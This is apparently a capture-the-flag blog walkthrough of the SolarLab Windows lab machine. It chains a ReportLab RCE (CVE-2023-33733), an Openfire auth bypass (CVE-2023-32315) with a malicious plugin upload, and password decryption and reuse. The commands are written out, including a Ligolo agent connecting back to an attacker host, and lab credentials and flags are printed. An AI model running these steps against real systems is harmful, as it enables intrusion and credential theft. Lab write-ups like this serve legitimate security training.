Command Palette

Search for a command to run...

Blog
PreviousNext

Solar Lab - Walkthrough

SolarLab is a medium Windows machine that starts with a webpage featuring a business site. Moreover, an SMB share is accessible using a guest session that holds files with sensitive information for users on the remote machine. An attacker can extract valid credentials from this file and log in to a page allowing employees to fill out forms for company purposes. These forms are turned into PDFs using the ReportLab library, which is vulnerable to CVE-2023-33733. After some exploit development/modification, the attacker can get code execution as the user blake on the remote machine. Further enumeration of the remote machine, reveals that Openfire is installed and running locally. By using a SOCKS tunnel, the attacker can access the Administrator Console for Openfire. It turns out, that the version installed, is vulnerable to CVE-2023-32315 which allows the attacker to bypass the authentication screen, upload a malicious plugin, and get code execution as the openfire user. The openfire user can read the logs from when the server was installed and extract all the necessary information to crack the Administrator's password and it turns out that this password is re-used for the local Administrator account.

Reconnaissance

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.16 -oG allPorts

The scan reveals:

PORTSTATESERVICE
80/tcpopenhttp
135/tcpopenmsrpc
139/tcpopennetbios-ssn
445/tcpopenmicrosoft-ds
6791/tcpopenhnm

A targeted scan provides more details:

sudo nmap -p80,135,139,445,6791 -sCV 10.10.11.16 -oN targeted
  • HTTP (80) → Nginx 1.24.0, redirecting to solarlab.htb
  • HTTP (6791) → Nginx 1.24.0, redirecting to report.solarlab.htb:6791

We add the hostnames to /etc/hosts:

sudo sh -c 'echo "10.10.11.16 solarlab.htb report.solarlab.htb" >> /etc/hosts'

solarlab.htb

Enumeration

We access an SMB share anonymously:

smbclient -N //10.10.11.16/Documents

We retrieve details-file.xlsx containing credentials:

details-file.xlsx

Testing the credentials on report.solarlab.htb:6791, we find that BlakeB:ThisCanB3typedeasily1@ works.

Exploitation

The report application uses ReportLab, which is vulnerable to CVE-2023-33733. We craft a malicious payload to gain RCE:

burpsuite + poc

We obtain a shell as blake and capture the user flag:

cat ../../Desktop/user.txt

User flag: 145a80073bcc9bf8699ebe25f215304c

Post-Exploitation

We upgrade to a Meterpreter session using Metasploit. Enumerating the system, we find Openfire running locally on port 9090.

Using Ligolo, we tunnel to access the internal Openfire service:

ligolo-proxy -selfcert

On the target:

C:\Users\blake\Documents>agent.exe -connect 10.10.14.9:11601 -ignore-cert

240.0.0.1:9090

Privilege Escalation

We exploit CVE-2023-32315 to bypass authentication and create an admin account:

python3 CVE-2023-32315.py -t http://240.0.0.1:9090

The script creates credentials: 31r7xg:3vws6i

240.0.0.1:9090

We upload a malicious plugin to gain a shell as the openfire user.

From the Openfire configuration file C:\Program Files\Openfire\embedded-db\openfire.script, we extract the encrypted admin password and decrypt it using the password key:

java OpenFireDecryptPass becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@

This password is reused for the local Administrator account:

smbclient -U Administrator //10.10.11.16/C$

We retrieve the root flag:

cat root.txt

Root flag: e07ec04da78b9f7dcfee9b02c1f1ba54